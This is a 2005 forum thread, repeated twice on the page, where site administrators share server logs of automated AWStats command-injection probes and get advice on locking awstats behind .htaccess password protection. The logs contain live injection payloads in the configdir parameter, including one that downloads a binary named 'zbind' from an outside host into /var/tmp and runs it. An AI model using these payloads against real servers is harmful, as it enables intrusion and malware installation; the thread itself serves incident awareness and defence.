I just saw this scroll across the logfiles. Is this something new?
217.172.168.109 - - [06/Feb/2005:06:36:37 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 217.172.168.109 - - [06/Feb/2005:06:36:38 -0500] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 200 662 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 217.172.168.109 - - [06/Feb/2005:06:36:39 -0500] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 281 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 220.90.217.141 - - [06/Feb/2005:06:39:17 -0500] "GET /cgi-bin/awstats.pl?configdir=%7c%20cd%20%2fvar%2ftmp%3bwget%20lightb.home.ro%2fzbind%3bchmod%20%2bx%20zbind%3b.%2fzbind%20%7c%20 HTTP/1.1" 200 717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
I just saw something similar... looks like someone has an automated scanner at work.
2005-02-08 21:12:29 GET /cgi-bin/awstats/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730 2005-02-08 21:12:29 GET /cgi-bin/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730 2005-02-08 21:12:29 GET /cgi/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730 2005-02-08 21:12:29 GET /cp/awstats/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730 2005-02-08 21:12:29 GET /awstats/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730 2005-02-08 21:12:29 GET /stat-cgi/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730 2005-02-08 21:12:29 GET /awstats/perl/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730
how to use .htaccess for cgi-bin
any help?
After trying this, all I kept getting was 404 errors.
Any ideas? and i followed what you said.
Which file is not found? If you don't know look it up in awstats or in your server's error log file.
Thanks, I got it working in the end, I was looking in the wrong directory, sorry about that, got it working and directory secured.
Just a quick note to anyone struggling with this issue. After making the changes shown above, you need to type http://www.yoursite.com/awstats/mystats/awstats.pl?config=yoursite.com to view the stats (not http://www.yoursite.com/awstats/awstats.pl?config=yoursite.com)
Looks like it.
Use .htaccess for your awstats directory.
Search google for FunWebProducts.
Please read e.g.:
http://help.bnsi.net/htpasswd/htpasswd.php
Create a directory for awstats files in cgi-bin, e.g. 'mystats'. Place all awstats files except awredir.pl in this directory. Then write .htaccess file for this new directory.
Content could look somewhat like:
AuthName "MyStats" AuthType Basic AuthUserFile /the/path/to/your/cgi-bin/mystats/.htpasswd require valid-user
Then write .htpasswd file
contents: yourusername:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
for xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx get an ecrypted password = search google for htpasswd generator. Or go here: http://mirage.golden.net/generator/
Place both files in the mystats directory.
Do not forget to change your awstats.xyz.conf:
DirCgi="/cgi-bin/mystats"
AllowAccessFromWebToAuthenticatedUsersOnly=1
AllowAccessFromWebToFollowingAuthenticatedUsers="yourusername"
Now it should work.
If it doesn't, delete .htaccess on your server and write again.
Log in to post a comment.
I just saw this scroll across the logfiles. Is this something new?
217.172.168.109 - - [06/Feb/2005:06:36:37 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.172.168.109 - - [06/Feb/2005:06:36:38 -0500] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 200 662 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.172.168.109 - - [06/Feb/2005:06:36:39 -0500] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 281 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
220.90.217.141 - - [06/Feb/2005:06:39:17 -0500] "GET /cgi-bin/awstats.pl?configdir=%7c%20cd%20%2fvar%2ftmp%3bwget%20lightb.home.ro%2fzbind%3bchmod%20%2bx%20zbind%3b.%2fzbind%20%7c%20 HTTP/1.1" 200 717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
I just saw something similar... looks like someone has an automated scanner at work.
2005-02-08 21:12:29 GET /cgi-bin/awstats/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730
2005-02-08 21:12:29 GET /cgi-bin/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730
2005-02-08 21:12:29 GET /cgi/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730
2005-02-08 21:12:29 GET /cp/awstats/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730
2005-02-08 21:12:29 GET /awstats/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730
2005-02-08 21:12:29 GET /stat-cgi/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730
2005-02-08 21:12:29 GET /awstats/perl/awstats.pl configdir=|%20id%20| - 64.225.113.56 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - 404 10730
how to use .htaccess for cgi-bin
any help?
After trying this, all I kept getting was 404 errors.
Any ideas? and i followed what you said.
Which file is not found?
If you don't know look it up in awstats or in your server's error log file.
Thanks, I got it working in the end, I was looking in the wrong directory, sorry about that, got it working and directory secured.
Just a quick note to anyone struggling with this issue. After making the changes shown above, you need to type http://www.yoursite.com/awstats/mystats/awstats.pl?config=yoursite.com
to view the stats (not http://www.yoursite.com/awstats/awstats.pl?config=yoursite.com)
Looks like it.
Use .htaccess for your awstats directory.
Search google for FunWebProducts.
Please read e.g.:
http://help.bnsi.net/htpasswd/htpasswd.php
Create a directory for awstats files in cgi-bin, e.g. 'mystats'.
Place all awstats files except awredir.pl in this directory.
Then write .htaccess file for this new directory.
Content could look somewhat like:
AuthName "MyStats"
AuthType Basic
AuthUserFile /the/path/to/your/cgi-bin/mystats/.htpasswd
require valid-user
Then write .htpasswd file
contents:
yourusername:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
for xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx get an ecrypted password = search google for htpasswd generator.
Or go here:
http://mirage.golden.net/generator/
Place both files in the mystats directory.
Do not forget to change your awstats.xyz.conf:
DirCgi="/cgi-bin/mystats"
AllowAccessFromWebToAuthenticatedUsersOnly=1
AllowAccessFromWebToFollowingAuthenticatedUsers="yourusername"
Now it should work.
If it doesn't, delete .htaccess on your server and write again.